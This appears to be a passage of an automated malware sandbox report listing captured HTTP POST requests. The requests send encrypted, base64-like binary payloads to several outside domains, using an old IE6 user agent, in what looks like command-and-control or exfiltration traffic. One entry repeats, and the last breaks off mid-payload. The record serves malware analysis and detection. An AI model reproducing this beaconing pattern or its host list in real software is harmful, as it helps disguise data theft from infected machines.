                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 76 4c 69 42 71 78 37 78 33 66 79 44 62 4d 74 4b 61 53 57 30 44 51 45 63 43 32 6c 65 45 66 50 74 4d 6c 4e 75 4c 68 74 63 30 66 47 53 6a 44 37 4c 6b 49 79 62 35 36 49 53 67 4c 76 34 35 35 52 4a 66 77 43 76 6b 44 75 56 33 74 33 77 44 57 62 34 7a 41 45 6b 76 75 64 37 31 73 31 59 52 68 59 47 31 75 76 34 64 36 36 71 74 79 64 77 73 56 30 72 67 44 71 43 47 6b 30 79 72 76 7a 6a 6d 4b 71 67 67 66 51 2b 76 31 45 41 50 4c 64 56 35 67 47 57 71 2f 58 6b 6c 72 4e 33 45 6c 52 32 76 42 4e 46 57 78 52 64 74 48 4e 6d 63 4b 70 67 61 6c 32 47 64 57 34 51 55 61 6d 47 68 6d 41 73 78 2b 4b 64 50 55 4b 32 52 2f 4a 6f 75 30 50 73 72 56 49 79 46 53 52 33 6a 68 2f 4b 4e 30 32 6e 70 47 59 71 6c 4f 49 59 51 56 35 54 33 46 30 56 31 71 50 55 78 56 79 43 73 75 59 77 70 57 4f 67 75 35 37 34 57 55 78 4b 58 41 6e 79 42 44 71 4a 77 76 49 66 59 44 30 6a 6c 54 4a 4b 70 74 71 68 5a 77 6a 37 74 5a 4e 35 78 6d 31 77 58 54 66 32 7a 4e 78 70 43 5a 2b 53 6c 37 73 50 2f 4f 58 4d 55 59 50 4f 71 75 36 56 2f 44 4e 6e 51 75 59 4a 67 79 4e 69 66 49 54 72 70 6c 46 39 4c 35 33 68 52 68 56 70 30 4e 54 41 4b 53 46 38 73 47 54 75 52 44 4d 52 44 33 6a 66 48 39 6c 55 67 66 2f 76 62 41 4e 4f 64 54 35 53 41 37 56 4a 50 4c 73 4c 43 43 76 70 36 70 6d 71 69 5a 62 4f 2f 6b 77 30 46 78 72 69 71 45 7a 48 35 57 4c 46 4b 61 70 68 6c 70 57 44 45 5a 30 56 31 6f 52 70 46 45 6e 47 71 76 54 33 65 4a 6f 6b 4c 53 44 6e 4a 2f 63 68 39 54 42 69 6f 73 30 53 64 4c 63 59 53 69 2f 56 34 75 71 36 51 61 59 65 42 4c 72 63 6f 32 48 77 71 31 39 78 75 57 6c 34 64 4e 4a 59 74 4f 65 44 49 6e 37 4d 56 31 2f 55 67 73 7a 30 7a 74 7a 51 4f 2f 79 41 57 6f 38 64 2b 77 36 67 6f 35 4c 4c 41 33 6d 4b 6f 69 47 48 69 70 66 42 37 4f 7a 69 54 59 58 73 6e 6c 76 75 69 4f 64 6b 72 78 48 2b 61 36 64 4c 76 79 54 79 47 41 3d 3d Data Ascii: vLiBqx7x3fyDbMtKaSW0DQEcC2leEfPtMlNuLhtc0fGSjD7LkIyb56ISgLv455RJfwCvkDuV3t3wDWb4zAEkvud71s1YRhYG1uv4d66qtydwsV0rgDqCGk0yrvzjmKqggfQ+v1EAPLdV5gGWq/XklrN3ElR2vBNFWxRdtHNmcKpgal2GdW4QUamGhmAsx+KdPUK2R/Jou0PsrVIyFSR3jh/KN02npGYqlOIYQV5T3F0V1qPUxVyCsuYwpWOgu574WUxKXAnyBDqJwvIfYD0jlTJKptqhZwj7tZN5xm1wXTf2zNxpCZ+Sl7sP/OXMUYPOqu6V/DNnQuYJgyNifITrplF9L53hRhVp0NTAKSF8sGTuRDMRD3jfH9lUgf/vbANOdT5SA7VJPLsLCCvp6pmqiZbO/kw0FxriqEzH5WLFKaphlpWDEZ0V1oRpFEnGqvT3eJokLSDnJ/ch9TBios0SdLcYSi/V4uq6QaYeBLrco2Hwq19xuWl4dNJYtOeDIn7MV1/Ugsz0ztzQO/yAWo8d+w6go5LLA3mKoiGHipfB7OziTYXsnlvuiOdkrxH+a6dLvyTyGA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 37 58 77 52 79 4e 41 75 35 2f 77 4f 34 69 6b 32 59 7a 4d 6a 77 34 50 53 51 44 37 34 50 58 2b 56 42 43 4e 34 39 56 4b 37 4e 63 6d 65 5a 53 39 31 54 56 39 53 71 48 55 6a 5a 76 54 69 68 66 37 6a 4a 46 46 79 6d 6f 44 5a 6b 44 4e 53 7a 5a 6c 4d 76 6a 71 67 43 61 76 78 6f 4c 34 6e 2b 4c 66 73 4d 56 37 6f 72 58 43 67 38 32 65 55 68 65 41 4e 2b 2b 78 57 69 6d 54 53 41 36 32 79 45 57 79 39 41 4f 75 42 33 78 70 65 4b 58 54 78 38 76 41 32 35 33 56 4a 62 6b 63 55 49 54 36 31 50 6f 5a 49 70 6d 53 7a 72 30 64 5a 52 6f 55 4c 31 62 69 67 6a 64 64 50 62 4f 4f 47 51 32 35 70 4e 48 42 34 79 58 68 46 30 61 6b 50 4a 68 50 6d 58 33 54 51 55 75 66 4a 2b 76 75 66 55 4d 69 65 30 47 64 78 68 51 72 4e 53 73 5a 72 4b 71 62 55 44 4f 78 4d 32 37 41 69 45 63 68 6b 59 41 48 6c 58 6b 2f 31 75 65 2b 63 56 52 68 72 47 37 41 4b 6c 47 38 45 2f 57 46 4f 78 65 4a 74 65 54 5a 6e 57 6d 33 7a 61 4d 77 4a 78 4e 36 6f 71 72 6d 6c 2f 62 4e 34 43 6b 39 43 4d 61 70 61 62 7a 56 6b 64 65 44 61 43 71 69 6b 67 61 34 39 42 63 57 77 48 62 37 34 49 74 66 63 5a 5a 41 69 61 44 49 57 78 5a 6c 39 2b 72 7a 32 70 38 4d 66 45 79 7a 58 38 75 46 74 63 69 48 54 79 78 49 67 66 56 4b 72 64 47 76 61 6b 48 4d 59 69 6b 2b 36 41 78 7a 69 64 6b 57 72 68 2f 62 42 68 45 2f 63 69 61 35 72 4a 61 46 66 58 36 6c 54 53 6c 4b 66 54 54 53 6b 37 7a 53 41 68 6a 69 4e 34 71 62 47 65 63 70 6d 43 65 4f 31 4d 64 34 33 59 74 4f 47 42 73 76 34 64 6f 6f 47 45 6e 61 4b 76 2f 70 6d 6f 58 57 48 48 4f 6d 41 30 63 67 79 49 56 78 38 67 33 39 75 65 4f 55 6c 49 76 4e 4e 54 49 39 41 6a 35 53 4b 64 6a 6f 55 66 33 4b 4c 57 42 65 6f 6f 5a 6f 51 73 52 6c 73 6f 63 39 76 6b 4b 67 43 56 32 79 56 34 74 45 6b 4e 68 73 79 30 37 6c 4d 45 2b 51 6d 52 34 69 7a 4d 6c 2b 6c 53 32 77 52 6a 6d 76 70 6c 2f 4a 77 38 76 73 30 Data Ascii: 7XwRyNAu5/wO4ik2YzMjw4PSQD74PX+VBCN49VK7NcmeZS91TV9SqHUjZvTihf7jJFFymoDZkDNSzZlMvjqgCavxoL4n+LfsMV7orXCg82eUheAN++xWimTSA62yEWy9AOuB3xpeKXTx8vA253VJbkcUIT61PoZIpmSzr0dZRoUL1bigjddPbOOGQ25pNHB4yXhF0akPJhPmX3TQUufJ+vufUMie0GdxhQrNSsZrKqbUDOxM27AiEchkYAHlXk/1ue+cVRhrG7AKlG8E/WFOxeJteTZnWm3zaMwJxN6oqrml/bN4Ck9CMapabzVkdeDaCqikga49BcWwHb74ItfcZZAiaDIWxZl9+rz2p8MfEyzX8uFtciHTyxIgfVKrdGvakHMYik+6AxzidkWrh/bBhE/cia5rJaFfX6lTSlKfTTSk7zSAhjiN4qbGecpmCeO1Md43YtOGBsv4dooGEnaKv/pmoXWHHOmA0cgyIVx8g39ueOUlIvNNTI9Aj5SKdjoUf3KLWBeooZoQsRlsoc9vkKgCV2yV4tEkNhsy07lME+QmR4izMl+lS2wRjmvpl/Jw8vs0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 36 35 67 47 70 49 36 32 66 77 75 67 2f 39 41 52 52 67 50 57 5a 56 4a 74 44 48 69 71 53 66 36 35 70 6e 66 74 76 4b 49 64 33 4b 6a 62 7a 5a 7a 58 4d 4e 45 63 48 30 6d 47 59 31 71 4d 4d 56 78 53 5a 44 55 34 79 6d 30 47 63 56 55 70 48 71 6f 66 6e 63 65 79 61 46 48 2b 5a 6f 47 33 32 34 30 78 55 43 6a 32 52 37 6b 76 77 6d 34 61 68 7a 30 43 56 51 65 51 4b 70 64 6a 6a 6b 36 33 64 43 54 65 36 43 65 71 69 6f 6e 68 37 34 62 50 30 38 6e 4b 2f 44 4c 6c 6e 6d 4f 50 62 39 39 51 4f 55 4e 6a 76 6f 4b 7a 38 77 41 76 30 52 73 4e 41 56 39 50 51 48 32 56 48 50 46 41 42 76 57 61 61 50 54 38 65 42 31 58 42 68 51 77 36 46 61 52 54 39 4b 35 31 42 53 75 76 70 54 42 2f 59 72 34 48 36 47 37 4e 61 68 69 68 72 36 6c 69 41 73 38 39 49 70 73 39 6c 73 4a 50 38 69 38 73 39 31 2f 53 7a 4e 53 30 59 2f 31 56 75 42 6d 45 33 74 56 4b 68 6f 32 37 6c 36 66 69 45 71 51 41 32 76 62 35 61 6d 47 33 4a 6d 4f 62 72 74 6f 54 71 46 58 64 42 33 31 6d 67 70 59 4b 6f 56 34 43 56 73 4c 48 72 49 33 39 75 7a 6e 6f 43 32 36 2f 4e 74 44 45 41 59 39 6f 52 37 76 4e 59 52 6a 4f 65 44 48 46 59 73 53 2b 71 4a 49 42 47 6c 56 4a 74 79 43 61 69 51 39 61 45 57 56 34 32 49 54 52 30 57 4b 2b 55 51 43 4e 6b 6f 39 76 55 63 38 48 2b 6c 76 47 45 48 47 74 77 36 61 6e 43 4b 36 2f 6d 74 33 74 4e 30 78 58 6a 6e 4d 47 47 35 57 65 70 48 57 6e 7a 54 35 6b 37 7a 55 73 51 7a 67 61 2b 46 77 4f 6e 54 4f 63 35 43 58 62 4d 6e 51 49 38 74 52 59 5a 63 52 6c 49 4b 53 76 39 77 4a 75 79 43 30 75 2f 55 73 74 7a 48 33 59 6c 52 31 50 43 61 71 36 4f 6f 43 31 36 49 55 68 61 36 64 5a 42 73 71 59 36 6f 32 64 4e 72 4a 5a 76 47 48 64 35 6f 56 71 5a 6e 6e 4a 50 49 34 44 2b 62 37 5a 75 34 59 4f 47 53 56 31 46 4b 51 67 6e 56 76 61 6b 44 46 2f 36 2b 7a 55 77 49 55 4d 42 2f 72 61 6c 47 44 59 44 79 39 48 31 30 70 63 31 44 34 4e 39 6d 4e 41 30 47 2b 42 44 45 4d 49 48 4e 4e 36 76 4b Data Ascii: g65gGpI62fwug/9ARRgPWZVJtDHiqSf65pnftvKId3KjbzZzXMNEcH0mGY1qMMVxSZDU4ym0GcVUpHqofnceyaFH+ZoG3240xUCj2R7kvwm4ahz0CVQeQKpdjjk63dCTe6Ceqionh74bP08nK/DLlnmOPb99QOUNjvoKz8wAv0RsNAV9PQH2VHPFABvWaaPT8eB1XBhQw6FaRT9K51BSuvpTB/Yr4H6G7Nahihr6liAs89Ips9lsJP8i8s91/SzNS0Y/1VuBmE3tVKho27l6fiEqQA2vb5amG3JmObrtoTqFXdB31mgpYKoV4CVsLHrI39uznoC26/NtDEAY9oR7vNYRjOeDHFYsS+qJIBGlVJtyCaiQ9aEWV42ITR0WK+UQCNko9vUc8H+lvGEHGtw6anCK6/mt3tN0xXjnMGG5WepHWnzT5k7zUsQzga+FwOnTOc5CXbMnQI8tRYZcRlIKSv9wJuyC0u/UstzH3YlR1PCaq6OoC16IUha6dZBsqY6o2dNrJZvGHd5oVqZnnJPI4D+b7Zu4YOGSV1FKQgnVvakDF/6+zUwIUMB/ralGDYDy9H10pc1D4N9mNA0G+BDEMIHNN6vK
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 39 37 71 34 47 6d 38 39 32 66 7a 48 47 4a 49 7a 6a 6b 7a 49 6f 58 69 5a 46 61 36 46 5a 6b 76 65 45 2b 7a 72 32 43 31 4d 6b 42 47 4b 4a 67 46 56 67 62 37 42 68 77 4a 35 30 64 74 54 50 4e 72 49 67 64 5a 43 4c 51 71 46 4e 4a 56 4c 6e 41 4f 2b 4e 74 77 4d 77 6c 49 70 68 75 34 42 6f 46 52 63 59 58 47 6c 66 6a 42 51 4f 33 47 65 57 6f 77 33 41 78 57 35 47 46 39 75 37 6a 48 71 4e 71 6e 53 65 79 53 50 78 39 41 33 2b 65 61 49 48 6c 63 52 50 71 78 42 43 4a 58 4d 37 6a 43 6e 77 57 77 2b 75 57 58 46 36 7a 4a 61 6e 75 35 56 42 63 70 6c 77 6b 4e 63 44 35 61 64 5a 6d 33 50 55 74 69 57 45 54 55 51 2f 67 57 7a 32 4a 39 37 6b 62 4d 57 45 35 45 36 71 53 49 77 2f 44 63 52 37 59 70 35 4a 6e 7a 68 59 74 4c 45 63 4c 56 31 42 41 4d 38 49 34 56 31 49 51 2f 4a 58 6f 38 6f 34 41 32 58 57 67 62 69 33 30 70 35 70 2f 78 65 6e 4a 4e 67 37 32 52 55 33 46 61 54 38 56 6b 75 54 6b 57 78 38 41 72 78 66 31 74 72 62 2b 55 7a 56 78 50 47 6c 48 45 72 61 34 70 31 44 5a 67 53 71 42 4b 42 61 72 49 44 41 43 55 72 66 41 51 57 74 71 51 4f 47 54 6c 71 4f 57 4d 45 6e 49 61 46 6b 57 55 51 4b 2f 6d 41 38 77 59 42 4d 2b 55 66 4e 5a 63 63 53 5a 56 55 42 63 2b 4d 5a 69 51 4e 4f 6e 78 2b 67 50 74 31 43 57 4a 46 45 47 5a 76 39 2f 54 4e 50 4e 50 57 34 70 45 6d 74 35 43 64 5a 4e 44 53 6a 50 59 77 45 65 61 33 33 67 45 72 6e 51 62 36 4f 6b 54 48 69 63 53 73 6b 45 2f 49 46 51 4d 48 2b 51 79 6c 76 74 67 67 58 39 44 61 51 38 36 69 4d 56 42 6f 37 51 68 33 53 32 71 72 4c 51 6c 4a 50 6d 51 61 47 74 43 6e 43 66 65 67 34 61 6f 45 49 48 65 6f 49 4a 34 4d 41 4c 56 43 6f 59 30 55 49 38 41 39 33 4c 64 31 4a 4d 59 55 4c 7a 46 4a 6a 6e 6b 37 42 61 58 54 48 4c 33 49 41 74 72 70 6b 4e 33 42 34 49 47 2f 79 32 64 2f 36 53 70 6c 7a 6c 45 64 58 51 48 68 55 67 4c 4b 34 50 62 4c 36 43 4b 45 51 53 4e 5a 69 5a 4b 65 35 64 57 55 49 59 6b 41 54 45 38 3d Data Ascii: 97q4Gm892fzHGJIzjkzIoXiZFa6FZkveE+zr2C1MkBGKJgFVgb7BhwJ50dtTPNrIgdZCLQqFNJVLnAO+NtwMwlIphu4BoFRcYXGlfjBQO3GeWow3AxW5GF9u7jHqNqnSeySPx9A3+eaIHlcRPqxBCJXM7jCnwWw+uWXF6zJanu5VBcplwkNcD5adZm3PUtiWETUQ/gWz2J97kbMWE5E6qSIw/DcR7Yp5JnzhYtLEcLV1BAM8I4V1IQ/JXo8o4A2XWgbi30p5p/xenJNg72RU3FaT8VkuTkWx8Arxf1trb+UzVxPGlHEra4p1DZgSqBKBarIDACUrfAQWtqQOGTlqOWMEnIaFkWUQK/mA8wYBM+UfNZccSZVUBc+MZiQNOnx+gPt1CWJFEGZv9/TNPNPW4pEmt5CdZNDSjPYwEea33gErnQb6OkTHicSskE/IFQMH+QylvtggX9DaQ86iMVBo7Qh3S2qrLQlJPmQaGtCnCfeg4aoEIHeoIJ4MALVCoY0UI8A93Ld1JMYULzFJjnk7BaXTHL3IAtrpkN3B4IG/y2d/6SplzlEdXQHhUgLK4PbL6CKEQSNZiZKe5dWUIYkATE8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 36 35 67 47 70 49 36 32 66 77 75 67 2f 39 41 52 52 67 50 57 5a 56 4a 74 44 48 69 71 53 66 36 35 70 6e 66 74 76 4b 49 64 33 4b 6a 62 7a 5a 7a 58 4d 4e 45 63 48 30 6d 47 59 31 71 4d 4d 56 78 53 5a 44 55 34 79 6d 30 47 63 56 55 70 48 71 6f 66 6e 63 65 79 61 46 48 2b 5a 6f 47 33 32 34 30 78 55 43 6a 32 52 37 6b 76 77 6d 34 61 68 7a 30 43 56 51 65 51 4b 70 64 6a 6a 6b 36 33 64 43 54 65 36 43 65 71 69 6f 6e 68 37 34 62 50 30 38 6e 4b 2f 44 4c 6c 6e 6d 4f 50 62 39 39 51 4f 55 4e 6a 76 6f 4b 7a 38 77 41 76 30 52 73 4e 41 56 39 50 51 48 32 56 48 50 46 41 42 76 57 61 61 50 54 38 65 42 31 58 42 68 51 77 36 46 61 52 54 39 4b 35 31 42 53 75 76 70 54 42 2f 59 72 34 48 36 47 37 4e 61 68 69 68 72 36 6c 69 41 73 38 39 49 70 73 39 6c 73 4a 50 38 69 38 73 39 31 2f 53 7a 4e 53 30 59 2f 31 56 75 42 6d 45 33 74 56 4b 68 6f 32 37 6c 36 66 69 45 71 51 41 32 76 62 35 61 6d 47 33 4a 6d 4f 62 72 74 6f 54 71 46 58 64 42 33 31 6d 67 70 59 4b 6f 56 34 43 56 73 4c 48 72 49 33 39 75 7a 6e 6f 43 32 36 2f 4e 74 44 45 41 59 39 6f 52 37 76 4e 59 52 6a 4f 65 44 48 46 59 73 53 2b 71 4a 49 42 47 6c 56 4a 74 79 43 61 69 51 39 61 45 57 56 34 32 49 54 52 30 57 4b 2b 55 51 43 4e 6b 6f 39 76 55 63 38 48 2b 6c 76 47 45 48 47 74 77 36 61 6e 43 4b 36 2f 6d 74 33 74 4e 30 78 58 6a 6e 4d 47 47 35 57 65 70 48 57 6e 7a 54 35 6b 37 7a 55 73 51 7a 67 61 2b 46 77 4f 6e 54 4f 63 35 43 58 62 4d 6e 51 49 38 74 52 59 5a 63 52 6c 49 4b 53 76 39 77 4a 75 79 43 30 75 2f 55 73 74 7a 48 33 59 6c 52 31 50 43 61 71 36 4f 6f 43 31 36 49 55 68 61 36 64 5a 42 73 71 59 36 6f 32 64 4e 72 4a 5a 76 47 48 64 35 6f 56 71 5a 6e 6e 4a 50 49 34 44 2b 62 37 5a 75 34 59 4f 47 53 56 31 46 4b 51 67 6e 56 76 61 6b 44 46 2f 36 2b 7a 55 77 49 55 4d 42 2f 72 61 6c 47 44 59 44 79 39 48 31 30 70 63 31 44 34 4e 39 6d 4e 41 30 47 2b 42 44 45 4d 49 48 4e 4e 36 76 4b Data Ascii: g65gGpI62fwug/9ARRgPWZVJtDHiqSf65pnftvKId3KjbzZzXMNEcH0mGY1qMMVxSZDU4ym0GcVUpHqofnceyaFH+ZoG3240xUCj2R7kvwm4ahz0CVQeQKpdjjk63dCTe6Ceqionh74bP08nK/DLlnmOPb99QOUNjvoKz8wAv0RsNAV9PQH2VHPFABvWaaPT8eB1XBhQw6FaRT9K51BSuvpTB/Yr4H6G7Nahihr6liAs89Ips9lsJP8i8s91/SzNS0Y/1VuBmE3tVKho27l6fiEqQA2vb5amG3JmObrtoTqFXdB31mgpYKoV4CVsLHrI39uznoC26/NtDEAY9oR7vNYRjOeDHFYsS+qJIBGlVJtyCaiQ9aEWV42ITR0WK+UQCNko9vUc8H+lvGEHGtw6anCK6/mt3tN0xXjnMGG5WepHWnzT5k7zUsQzga+FwOnTOc5CXbMnQI8tRYZcRlIKSv9wJuyC0u/UstzH3YlR1PCaq6OoC16IUha6dZBsqY6o2dNrJZvGHd5oVqZnnJPI4D+b7Zu4YOGSV1FKQgnVvakDF/6+zUwIUMB/ralGDYDy9H10pc1D4N9mNA0G+BDEMIHNN6vK
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheData Raw: 46 73 75 30 2b 43 4d 45 43 76 32 6d 37 62 6a 66 71 68 73 43 65 30 78 36 45 66 6c 4a 31 63 57 58 42 2b 54 73 4e 69 44 74 54 75 64 4e 76 7a 70 38 32 67 71 36 51 77 61 58 34 77 72 6b 4b 74 64 73 51 41 36 4d 45 70 52 55 4e 45 33 34 53 79 68 38 51 49 6a 5a 76 50 33 65 75 75 45 33 44 66 7a 59 4b 74 2f 75 64 46 38 57 6b 54 49 36 68 7a 70 57 65 64 35 46 35 79 41 69 39 39 71 78 33 61 72 44 54 64 4c 6c 64 6e 54 6b 77 42 69 54 69 42 72 6c 62 47 65 79 72 64 38 42 4f 7a 65 69 54 54 38 42 35 59 44 61 38 39 4d 59 33 6e 59 75 67 47 77 41 52 39 59 2b 77 44 32 62 48 59 32 6d 46 58 65 4b 79 6d 57 56 6b 4b 52 68 4f 53 76 31 63 34 70 4c 41 76 56 6a 56 47 55 52 33 53 5a 54 34 41 64 5a 62 71 7a 75 54 55 4c 6a 64 50 4a 75 73 73 57 55 73 33 2b 45 75 76 47 6e 2f 53 6b 6e 6e 76 31 48 79 2f 78 2b 6f 46 6e 75 4d 52 67 39 7a 48 51 4c 72 56 30 36 7a 4f 4c 79 71 4f 2f 62 38 57 57 72 38 38 50 73 63 50 6e 39 56 72 74 37 64 59 63 38 32 78 6f 64 73 62 7a 7a 4b 4c 53 59 36 2b 50 73 53 65 32 61 77 37 6f 69 65 64 32 4e 6e 62 79 6f 4c 62 51 34 35 34 4a 73 58 59 6c 75 6d 63 4e 38 5a 6a 66 66 58 43 38 2b 46 69 57 76 78 58 63 70 4e 4c 47 69 66 30 66 6c 71 54 69 75 63 77 56 4b 68 52 6a 36 45 7a 41 62 4f 64 66 34 78 66 6e 79 56 68 58 35 59 74 41 47 34 30 68 31 73 4d 72 72 6c 2b 79 59 66 6b 35 4b 35 57 54 77 76 49 39 68 51 44 39 4f 31 50 68 7a 41 42 51 4f 62 75 4a 37 61 70 52 55 70 71 47 4b 49 45 4d 31 75 46 35 2f 63 43 30 47 49 48 55 62 77 5a 76 4d 57 7a 79 59 52 76 52 4f 37 49 4a 54 41 57 6e 5a 76 4b 32 6c 31 71 50 74 46 66 76 5a 59 49 6d 6c 6d 71 7a 77 46 33 79 49 6b 36 36 65 4c 70 44 79 31 56 4c 71 73 64 39 4a 6c 65 4c 78 66 4b 61 4c 67 4c 54 71 70 68 61 4e 6d 51 49 3d Data Ascii: Fsu0+CMECv2m7bjfqhsCe0x6EflJ1cWXB+TsNiDtTudNvzp82gq6QwaX4wrkKtdsQA6MEpRUNE34Syh8QIjZvP3euuE3DfzYKt/udF8WkTI6hzpWed5F5yAi99qx3arDTdLldnTkwBiTiBrlbGeyrd8BOzeiTT8B5YDa89MY3nYugGwAR9Y+wD2bHY2mFXeKymWVkKRhOSv1c4pLAvVjVGUR3SZT4AdZbqzuTULjdPJussWUs3+EuvGn/Sknnv1Hy/x+oFnuMRg9zHQLrV06zOLyqO/b8WWr88PscPn9Vrt7dYc82xodsbzzKLSY6+PsSe2aw7oied2NnbyoLbQ454JsXYlumcN8ZjffXC8+FiWvxXcpNLGif0flqTiucwVKhRj6EzAbOdf4xfnyVhX5YtAG40h1sMrrl+yYfk5K5WTwvI9hQD9O1PhzABQObuJ7apRUpqGKIEM1uF5/cC0GIHUbwZvMWzyYRvRO7IJTAWnZvK2l1qPtFfvZYImlmqzwF3yIk66eLpDy1VLqsd9JleLxfKaLgLTqphaNmQI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheData Raw: 72 62 77 6c 71 6b 50 48 44 2f 31 77 41 66 72 77 53 73 4d 72 31 57 7a 4b 2f 70 33 70 35 74 39 59 4a 77 46 68 78 38 51 73 53 2b 66 67 57 34 72 73 43 49 65 6f 45 30 6c 43 56 42 67 4d 4b 34 69 68 71 55 4d 6d 47 41 58 75 6e 48 6f 43 74 68 62 71 38 4f 76 4c 51 2b 56 34 71 53 73 61 76 4c 34 37 68 6e 4b 44 35 66 31 4a 51 37 66 78 6b 6f 43 6f 59 4a 46 48 57 64 46 44 67 4e 43 6b 48 76 4a 61 65 48 32 52 6a 36 6c 49 31 58 45 52 36 52 35 64 48 36 57 43 79 6e 57 41 7a 58 73 2b 68 67 62 39 30 42 38 42 33 54 61 56 65 59 50 34 6b 4b 79 30 37 44 6d 64 64 2f 30 4c 35 72 34 35 6a 59 7a 62 73 36 54 51 4d 56 37 46 50 72 63 38 70 74 75 61 70 64 6b 61 2f 4f 5a 41 50 52 6a 49 64 52 43 59 76 2b 59 68 64 6d 67 51 58 53 42 52 47 6c 55 34 49 65 73 47 5a 6c 74 68 74 4c 67 4a 72 44 55 68 47 7a 31 39 6d 79 63 50 47 47 47 68 42 70 31 6b 4a 33 53 37 35 56 46 4c 6e 2b 45 42 70 61 67 39 34 64 30 4e 68 62 53 44 78 55 36 52 74 38 57 63 53 4a 77 76 37 73 56 47 45 75 54 76 7a 42 72 55 37 48 2b 6c 2b 51 5a 30 46 71 4a 55 58 43 76 42 69 68 51 4e 75 6a 37 41 2b 74 59 79 63 4c 56 59 4e 55 6b 6c 49 4a 79 33 71 69 6c 37 67 69 42 69 7a 4d 6e 2b 44 2f 76 65 58 43 76 30 5a 42 68 39 37 47 75 75 33 69 4e 5a 47 32 55 4a 4e 79 48 6e 4d 35 5a 33 65 7a 64 54 37 78 49 59 62 7a 67 70 31 4b 49 48 77 57 51 64 64 62 79 35 66 31 45 71 57 61 61 69 7a 6e 62 46 67 73 64 54 31 49 76 50 58 42 6b 57 70 64 50 78 65 50 71 6b 37 48 45 39 32 50 53 58 62 59 6f 4f 36 38 56 6f 67 74 41 39 59 38 41 4a 33 75 64 4f 64 79 70 35 72 7a 62 70 2b 72 76 43 43 70 7a 75 6e 71 6b 50 56 48 37 72 46 33 77 34 4b 4f 6b 36 36 76 42 56 6b 6e 68 6f 47 42 75 65 4f 47 72 31 31 38 70 64 71 66 6a 61 74 4c 6b 6e 61 72 33 73 76 59 33 47 58 56 67 3d Data Ascii: rbwlqkPHD/1wAfrwSsMr1WzK/p3p5t9YJwFhx8QsS+fgW4rsCIeoE0lCVBgMK4ihqUMmGAXunHoCthbq8OvLQ+V4qSsavL47hnKD5f1JQ7fxkoCoYJFHWdFDgNCkHvJaeH2Rj6lI1XER6R5dH6WCynWAzXs+hgb90B8B3TaVeYP4kKy07Dmdd/0L5r45jYzbs6TQMV7FPrc8ptuapdka/OZAPRjIdRCYv+YhdmgQXSBRGlU4IesGZlthtLgJrDUhGz19mycPGGGhBp1kJ3S75VFLn+EBpag94d0NhbSDxU6Rt8WcSJwv7sVGEuTvzBrU7H+l+QZ0FqJUXCvBihQNuj7A+tYycLVYNUklIJy3qil7giBizMn+D/veXCv0ZBh97Guu3iNZG2UJNyHnM5Z3ezdT7xIYbzgp1KIHwWQddby5f1EqWaaiznbFgsdT1IvPXBkWpdPxePqk7HE92PSXbYoO68VogtA9Y8AJ3udOdyp5rzbp+rvCCpzunqkPVH7rF3w4KOk66vBVknhoGBueOGr118pdqfjatLknar3svY3GXVg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 49 6b 32 63 53 67 6b 6b 77 50 74 4a 74 76 52 33 57 46 31 74 47 43 49 74 45 7a 63 6e 49 70 74 48 54 58 2b 53 2f 42 55 56 75 54 30 46 71 67 6c 72 59 38 6d 49 55 49 55 6f 66 54 30 56 41 33 58 6c 4a 44 43 53 6e 45 52 51 4a 56 5a 65 4a 34 69 4d 6f 51 66 58 4a 37 55 45 69 37 6a 41 4f 74 53 58 43 78 49 44 34 6f 6b 33 4c 30 6a 6d 6d 4f 43 2f 64 4e 48 6b 35 37 43 52 34 75 73 61 37 31 32 49 32 77 5a 66 4c 44 58 6d 4b 49 57 75 33 63 64 69 35 48 68 2f 63 65 78 49 73 6a 30 61 43 53 6c 4d 48 46 59 6b 48 53 2f 76 4c 4f 41 34 79 48 6c 71 4d 59 55 35 31 54 7a 49 6a 76 2b 77 52 4a 43 32 2b 6a 4c 37 47 36 39 4e 6c 32 71 2b 56 44 4b 79 72 58 4a 57 6f 39 56 70 6a 52 67 78 46 44 5a 38 4b 6c 78 57 57 7a 51 2b 2f 6e 72 57 42 4d 6f 67 58 7a 50 2f 73 2b 42 64 30 66 30 4e 4c 38 32 7a 64 30 48 54 7a 78 4f 68 37 75 42 4a 33 6c 52 6e 2b 46 6f 37 52 75 68 63 50 72 2b 54 2b 65 52 47 52 57 4f 62 4d 37 6f 41 68 43 74 79 48 4b 6e 58 5a 45 57 71 64 75 68 42 39 31 76 36 68 57 32 30 56 6b 70 33 38 6e 31 64 33 52 51 36 41 4a 52 68 57 68 76 4f 38 33 4f 32 73 44 39 48 6f 61 